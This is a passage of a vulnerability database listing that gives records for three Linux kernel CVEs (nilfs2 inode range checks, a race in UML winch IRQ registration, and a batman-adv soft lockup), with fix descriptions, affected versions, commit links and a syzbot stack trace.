                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix inode number range checks\n\nPatch series \"nilfs2: fix potential issues related to reserved inodes\".\n\nThis series fixes one use-after-free issue reported by syzbot, caused by\nnilfs2\u0027s internal inode being exposed in the namespace on a corrupted\nfilesystem, and a couple of flaws that cause problems if the starting\nnumber of non-reserved inodes written in the on-disk super block is\nintentionally (or corruptly) changed from its default value.  \n\n\nThis patch (of 3):\n\nIn the current implementation of nilfs2, \"nilfs-\u003ens_first_ino\", which\ngives the first non-reserved inode number, is read from the superblock,\nbut its lower limit is not checked.\n\nAs a result, if a number that overlaps with the inode number range of\nreserved inodes such as the root directory or metadata files is set in the\nsuper block parameter, the inode number test macros (NILFS_MDT_INODE and\nNILFS_VALID_INODE) will not function properly.\n\nIn addition, these test macros use left bit-shift calculations using with\nthe inode number as the shift count via the BIT macro, but the result of a\nshift calculation that exceeds the bit width of an integer is undefined in\nthe C specification, so if \"ns_first_ino\" is set to a large value other\nthan the default value NILFS_USER_INO (=11), the macros may potentially\nmalfunction depending on the environment.\n\nFix these issues by checking the lower bound of \"nilfs-\u003ens_first_ino\" and\nby preventing bit shifts equal to or greater than the NILFS_USER_INO\nconstant in the inode number test macros.\n\nAlso, change the type of \"ns_first_ino\" from signed integer to unsigned\ninteger to avoid the need for type casting in comparisons such as the\nlower bound check introduced this time."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:51:53.543Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/57235c3c88bb430043728d0d02f44a4efe386476"
        },
        {
          "url": "https://git.kernel.org/stable/c/08cab183a624ba71603f3754643ae11cab34dbc4"
        },
        {
          "url": "https://git.kernel.org/stable/c/731011ac6c37cbe97ece229fc6daa486276052c5"
        },
        {
          "url": "https://git.kernel.org/stable/c/3be4dcc8d7bea52ea41f87aa4bbf959efe7a5987"
        },
        {
          "url": "https://git.kernel.org/stable/c/fae1959d6ab2c52677b113935e36ab4e25df37ea"
        },
        {
          "url": "https://git.kernel.org/stable/c/9194f8ca57527958bee207919458e372d638d783"
        },
        {
          "url": "https://git.kernel.org/stable/c/1c91058425a01131ea30dda6cf43c67b17884d6a"
        },
        {
          "url": "https://git.kernel.org/stable/c/e2fec219a36e0993642844be0f345513507031f4"
        }
      ],
      "title": "nilfs2: fix inode number range checks",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42105",
    "datePublished": "2024-07-30T07:46:01.061Z",
    "dateReserved": "2024-07-29T15:50:41.175Z",
    "dateUpdated": "2026-01-05T10:51:53.543Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-39292 (GCVE-0-2024-39292)

Vulnerability from cvelistv5 – Published: 2024-06-24 13:52 – Updated: 2025-11-04 17:21

Title

um: Add winch to winch_handlers before registering winch IRQ

Summary

In the Linux kernel, the following vulnerability has been resolved: um: Add winch to winch_handlers before registering winch IRQ Registering a winch IRQ is racy, an interrupt may occur before the winch is added to the winch_handlers list. If that happens, register_winch_irq() adds to that list a winch that is scheduled to be (or has already been) freed, causing a panic later in winch_cleanup(). Avoid the race by adding the winch to the winch_handlers list before registering the IRQ, and rolling back if um_request_irq() fails.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/66ea9a7c682482147…
	https://git.kernel.org/stable/c/dc1ff95602ee908fc…
	https://git.kernel.org/stable/c/351d1a64544944b44…
	https://git.kernel.org/stable/c/31960d991e43c8d6d…
	https://git.kernel.org/stable/c/0c02d425a2fbe5264…
	https://git.kernel.org/stable/c/434a06c38ee1217a8…
	https://git.kernel.org/stable/c/73b8e21f76c7dda49…
	https://git.kernel.org/stable/c/a0fbbd36c156b9f7b…

Impacted products

Vendor

Product

Version

Linux

Affected: 42a359e31a0e438b5b978a8f0fecdbd3c86bb033 , < 66ea9a7c6824821476914bed21a476cd20094f33 (git)
Affected: 42a359e31a0e438b5b978a8f0fecdbd3c86bb033 , < dc1ff95602ee908fcd7d8acee7a0dadb61b1a0c0 (git)
Affected: 42a359e31a0e438b5b978a8f0fecdbd3c86bb033 , < 351d1a64544944b44732f6a64ed65573b00b9e14 (git)
Affected: 42a359e31a0e438b5b978a8f0fecdbd3c86bb033 , < 31960d991e43c8d6dc07245f19fc13398e90ead2 (git)
Affected: 42a359e31a0e438b5b978a8f0fecdbd3c86bb033 , < 0c02d425a2fbe52643a5859a779db0329e7dddd4 (git)
Affected: 42a359e31a0e438b5b978a8f0fecdbd3c86bb033 , < 434a06c38ee1217a8baa0dd7c37cc85d50138fb0 (git)
Affected: 42a359e31a0e438b5b978a8f0fecdbd3c86bb033 , < 73b8e21f76c7dda4905655d2e2c17dc5a73b87f1 (git)
Affected: 42a359e31a0e438b5b978a8f0fecdbd3c86bb033 , < a0fbbd36c156b9f7b2276871d499c9943dfe5101 (git)

Linux

Affected: 2.6.23
Unaffected: 0 , < 2.6.23 (semver)
Unaffected: 4.19.316 , ≤ 4.19.* (semver)
Unaffected: 5.4.278 , ≤ 5.4.* (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39292",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-24T15:15:10.639136Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-24T15:15:20.044Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:21:58.690Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/66ea9a7c6824821476914bed21a476cd20094f33"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dc1ff95602ee908fcd7d8acee7a0dadb61b1a0c0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/351d1a64544944b44732f6a64ed65573b00b9e14"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/31960d991e43c8d6dc07245f19fc13398e90ead2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0c02d425a2fbe52643a5859a779db0329e7dddd4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/434a06c38ee1217a8baa0dd7c37cc85d50138fb0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/73b8e21f76c7dda4905655d2e2c17dc5a73b87f1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a0fbbd36c156b9f7b2276871d499c9943dfe5101"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "arch/um/drivers/line.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "66ea9a7c6824821476914bed21a476cd20094f33",
              "status": "affected",
              "version": "42a359e31a0e438b5b978a8f0fecdbd3c86bb033",
              "versionType": "git"
            },
            {
              "lessThan": "dc1ff95602ee908fcd7d8acee7a0dadb61b1a0c0",
              "status": "affected",
              "version": "42a359e31a0e438b5b978a8f0fecdbd3c86bb033",
              "versionType": "git"
            },
            {
              "lessThan": "351d1a64544944b44732f6a64ed65573b00b9e14",
              "status": "affected",
              "version": "42a359e31a0e438b5b978a8f0fecdbd3c86bb033",
              "versionType": "git"
            },
            {
              "lessThan": "31960d991e43c8d6dc07245f19fc13398e90ead2",
              "status": "affected",
              "version": "42a359e31a0e438b5b978a8f0fecdbd3c86bb033",
              "versionType": "git"
            },
            {
              "lessThan": "0c02d425a2fbe52643a5859a779db0329e7dddd4",
              "status": "affected",
              "version": "42a359e31a0e438b5b978a8f0fecdbd3c86bb033",
              "versionType": "git"
            },
            {
              "lessThan": "434a06c38ee1217a8baa0dd7c37cc85d50138fb0",
              "status": "affected",
              "version": "42a359e31a0e438b5b978a8f0fecdbd3c86bb033",
              "versionType": "git"
            },
            {
              "lessThan": "73b8e21f76c7dda4905655d2e2c17dc5a73b87f1",
              "status": "affected",
              "version": "42a359e31a0e438b5b978a8f0fecdbd3c86bb033",
              "versionType": "git"
            },
            {
              "lessThan": "a0fbbd36c156b9f7b2276871d499c9943dfe5101",
              "status": "affected",
              "version": "42a359e31a0e438b5b978a8f0fecdbd3c86bb033",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "arch/um/drivers/line.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.23"
            },
            {
              "lessThan": "2.6.23",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.316",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.278",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.316",
                  "versionStartIncluding": "2.6.23",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.278",
                  "versionStartIncluding": "2.6.23",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "2.6.23",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "2.6.23",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "2.6.23",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "2.6.23",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "2.6.23",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.23",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\num: Add winch to winch_handlers before registering winch IRQ\n\nRegistering a winch IRQ is racy, an interrupt may occur before the winch is\nadded to the winch_handlers list.\n\nIf that happens, register_winch_irq() adds to that list a winch that is\nscheduled to be (or has already been) freed, causing a panic later in\nwinch_cleanup().\n\nAvoid the race by adding the winch to the winch_handlers list before\nregistering the IRQ, and rolling back if um_request_irq() fails."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:16:11.229Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/66ea9a7c6824821476914bed21a476cd20094f33"
        },
        {
          "url": "https://git.kernel.org/stable/c/dc1ff95602ee908fcd7d8acee7a0dadb61b1a0c0"
        },
        {
          "url": "https://git.kernel.org/stable/c/351d1a64544944b44732f6a64ed65573b00b9e14"
        },
        {
          "url": "https://git.kernel.org/stable/c/31960d991e43c8d6dc07245f19fc13398e90ead2"
        },
        {
          "url": "https://git.kernel.org/stable/c/0c02d425a2fbe52643a5859a779db0329e7dddd4"
        },
        {
          "url": "https://git.kernel.org/stable/c/434a06c38ee1217a8baa0dd7c37cc85d50138fb0"
        },
        {
          "url": "https://git.kernel.org/stable/c/73b8e21f76c7dda4905655d2e2c17dc5a73b87f1"
        },
        {
          "url": "https://git.kernel.org/stable/c/a0fbbd36c156b9f7b2276871d499c9943dfe5101"
        }
      ],
      "title": "um: Add winch to winch_handlers before registering winch IRQ",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39292",
    "datePublished": "2024-06-24T13:52:26.769Z",
    "dateReserved": "2024-06-21T11:16:40.627Z",
    "dateUpdated": "2025-11-04T17:21:58.690Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-40981 (GCVE-0-2024-40981)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:32 – Updated: 2026-01-05 10:37

Title

batman-adv: bypass empty buckets in batadv_purge_orig_ref()

Summary

In the Linux kernel, the following vulnerability has been resolved: batman-adv: bypass empty buckets in batadv_purge_orig_ref() Many syzbot reports are pointing to soft lockups in batadv_purge_orig_ref() [1] Root cause is unknown, but we can avoid spending too much time there and perhaps get more interesting reports. [1] watchdog: BUG: soft lockup - CPU#0 stuck for 27s! [kworker/u4:6:621] Modules linked in: irq event stamp: 6182794 hardirqs last enabled at (6182793): [<ffff8000801dae10>] __local_bh_enable_ip+0x224/0x44c kernel/softirq.c:386 hardirqs last disabled at (6182794): [<ffff80008ad66a78>] __el1_irq arch/arm64/kernel/entry-common.c:533 [inline] hardirqs last disabled at (6182794): [<ffff80008ad66a78>] el1_interrupt+0x24/0x68 arch/arm64/kernel/entry-common.c:551 softirqs last enabled at (6182792): [<ffff80008aab71c4>] spin_unlock_bh include/linux/spinlock.h:396 [inline] softirqs last enabled at (6182792): [<ffff80008aab71c4>] batadv_purge_orig_ref+0x114c/0x1228 net/batman-adv/originator.c:1287 softirqs last disabled at (6182790): [<ffff80008aab61dc>] spin_lock_bh include/linux/spinlock.h:356 [inline] softirqs last disabled at (6182790): [<ffff80008aab61dc>] batadv_purge_orig_ref+0x164/0x1228 net/batman-adv/originator.c:1271 CPU: 0 PID: 621 Comm: kworker/u4:6 Not tainted 6.8.0-rc7-syzkaller-g707081b61156 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 02/29/2024 Workqueue: bat_events batadv_purge_orig pstate: 80400005 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : should_resched arch/arm64/include/asm/preempt.h:79 [inline] pc : __local_bh_enable_ip+0x228/0x44c kernel/softirq.c:388 lr : __local_bh_enable_ip+0x224/0x44c kernel/softirq.c:386 sp : ffff800099007970 x29: ffff800099007980 x28: 1fffe00018fce1bd x27: dfff800000000000 x26: ffff0000d2620008 x25: ffff0000c7e70de8 x24: 0000000000000001 x23: 1fffe00018e57781 x22: dfff800000000000 x21: ffff80008aab71c4 x20: ffff0001b40136c0 x19: ffff0000c72bbc08 x18: 1fffe0001a817bb0 x17: ffff800125414000 x16: ffff80008032116c x15: 0000000000000001 x14: 1fffe0001ee9d610 x13: 0000000000000000 x12: 0000000000000003 x11: 0000000000000000 x10: 0000000000ff0100 x9 : 0000000000000000 x8 : 00000000005e5789 x7 : ffff80008aab61dc x6 : 0000000000000000 x5 : 0000000000000000 x4 : 0000000000000001 x3 : 0000000000000000 x2 : 0000000000000006 x1 : 0000000000000080 x0 : ffff800125414000 Call trace: __daif_local_irq_enable arch/arm64/include/asm/irqflags.h:27 [inline] arch_local_irq_enable arch/arm64/include/asm/irqflags.h:49 [inline] __local_bh_enable_ip+0x228/0x44c kernel/softirq.c:386 __raw_spin_unlock_bh include/linux/spinlock_api_smp.h:167 [inline] _raw_spin_unlock_bh+0x3c/0x4c kernel/locking/spinlock.c:210 spin_unlock_bh include/linux/spinlock.h:396 [inline] batadv_purge_orig_ref+0x114c/0x1228 net/batman-adv/originator.c:1287 batadv_purge_orig+0x20/0x70 net/batman-adv/originator.c:1300 process_one_work+0x694/0x1204 kernel/workqueue.c:2633 process_scheduled_works kernel/workqueue.c:2706 [inline] worker_thread+0x938/0xef4 kernel/workqueue.c:2787 kthread+0x288/0x310 kernel/kthread.c:388 ret_from_fork+0x10/0x20 arch/arm64/kernel/entry.S:860 Sending NMI from CPU 0 to CPUs 1: NMI backtrace for cpu 1 CPU: 1 PID: 0 Comm: swapper/1 Not tainted 6.8.0-rc7-syzkaller-g707081b61156 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 02/29/2024 pstate: 80400005 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : arch_local_irq_enable+0x8/0xc arch/arm64/include/asm/irqflags.h:51 lr : default_idle_call+0xf8/0x128 kernel/sched/idle.c:103 sp : ffff800093a17d30 x29: ffff800093a17d30 x28: dfff800000000000 x27: 1ffff00012742fb4 x26: ffff80008ec9d000 x25: 0000000000000000 x24: 0000000000000002 x23: 1ffff00011d93a74 x22: ffff80008ec9d3a0 x21: 0000000000000000 x20: ffff0000c19dbc00 x19: ffff8000802d0fd8 x18: 1fffe00036804396 x17: ffff80008ec9d000 x16: ffff8000802d089c x15: 0000000000000001 ---truncated---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/79636f63612677543…
	https://git.kernel.org/stable/c/154e3f862ba33675c…
	https://git.kernel.org/stable/c/82cdea8f3af1e3654…
	https://git.kernel.org/stable/c/92176caf9896572f0…
	https://git.kernel.org/stable/c/fed7914858a1f1f3e…
	https://git.kernel.org/stable/c/2685008a5f9a63643…
	https://git.kernel.org/stable/c/ae7f3cffe86aea3da…
	https://git.kernel.org/stable/c/40dc8ab605894acae…

Impacted products

Vendor

Product

Version

Linux

Affected: fb778ea173fcd58b8fc3d75c674f07fab187b55f , < 79636f636126775436a11ee9cf00a9253a33ac11 (git)
Affected: fb778ea173fcd58b8fc3d75c674f07fab187b55f , < 154e3f862ba33675cf3f4abf0a0a309a89df87d2 (git)
Affected: fb778ea173fcd58b8fc3d75c674f07fab187b55f , < 82cdea8f3af1e36543c937df963d108c60bea030 (git)
Affected: fb778ea173fcd58b8fc3d75c674f07fab187b55f , < 92176caf9896572f00e741a93cecc0ef1172da07 (git)
Affected: fb778ea173fcd58b8fc3d75c674f07fab187b55f , < fed7914858a1f1f3e6350bb0f620d6ef15107d16 (git)
Affected: fb778ea173fcd58b8fc3d75c674f07fab187b55f , < 2685008a5f9a636434a8508419cee8158a2f52c8 (git)
Affected: fb778ea173fcd58b8fc3d75c674f07fab187b55f , < ae7f3cffe86aea3da0e8e079525a1ae619b8862a (git)
Affected: fb778ea173fcd58b8fc3d75c674f07fab187b55f , < 40dc8ab605894acae1473e434944924a22cfaaa0 (git)

Linux

Affected: 2.6.39
Unaffected: 0 , < 2.6.39 (semver)
Unaffected: 4.19.317 , ≤ 4.19.* (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.96 , ≤ 6.1.* (semver)
Unaffected: 6.6.36 , ≤ 6.6.* (semver)
Unaffected: 6.9.7 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:58:46.464Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/79636f636126775436a11ee9cf00a9253a33ac11"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/154e3f862ba33675cf3f4abf0a0a309a89df87d2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/82cdea8f3af1e36543c937df963d108c60bea030"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/92176caf9896572f00e741a93cecc0ef1172da07"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fed7914858a1f1f3e6350bb0f620d6ef15107d16"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2685008a5f9a636434a8508419cee8158a2f52c8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ae7f3cffe86aea3da0e8e079525a1ae619b8862a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/40dc8ab605894acae1473e434944924a22cfaaa0"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40981",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:02:19.871778Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:21.396Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/batman-adv/originator.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "79636f636126775436a11ee9cf00a9253a33ac11",
              "status": "affected",
              "version": "fb778ea173fcd58b8fc3d75c674f07fab187b55f",
              "versionType": "git"
            },
            {
              "lessThan": "154e3f862ba33675cf3f4abf0a0a309a89df87d2",
              "status": "affected",
              "version": "fb778ea173fcd58b8fc3d75c674f07fab187b55f",
              "versionType": "git"
            },
            {
              "lessThan": "82cdea8f3af1e36543c937df963d108c60bea030",
              "status": "affected",
              "version": "fb778ea173fcd58b8fc3d75c674f07fab187b55f",
              "versionType": "git"
            },
            {
              "lessThan": "92176caf9896572f00e741a93cecc0ef1172da07",
              "status": "affected",
              "version": "fb778ea173fcd58b8fc3d75c674f07fab187b55f",
              "versionType": "git"
            },
            {
              "lessThan": "fed7914858a1f1f3e6350bb0f620d6ef15107d16",
              "status": "affected",
              "version": "fb778ea173fcd58b8fc3d75c674f07fab187b55f",
              "versionType": "git"
            },
            {
              "lessThan": "2685008a5f9a636434a8508419cee8158a2f52c8",
              "status": "affected",
              "version": "fb778ea173fcd58b8fc3d75c674f07fab187b55f",
              "versionType": "git"
            },
            {
              "lessThan": "ae7f3cffe86aea3da0e8e079525a1ae619b8862a",
              "status": "affected",
              "version": "fb778ea173fcd58b8fc3d75c674f07fab187b55f",
              "versionType": "git"
            },
            {
              "lessThan": "40dc8ab605894acae1473e434944924a22cfaaa0",
              "status": "affected",
              "version": "fb778ea173fcd58b8fc3d75c674f07fab187b55f",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/batman-adv/originator.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.39"
            },
            {
              "lessThan": "2.6.39",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.317",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.96",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.36",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.317",
                  "versionStartIncluding": "2.6.39",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "2.6.39",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "2.6.39",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "2.6.39",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.96",
                  "versionStartIncluding": "2.6.39",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.36",
                  "versionStartIncluding": "2.6.39",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.7",
                  "versionStartIncluding": "2.6.39",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
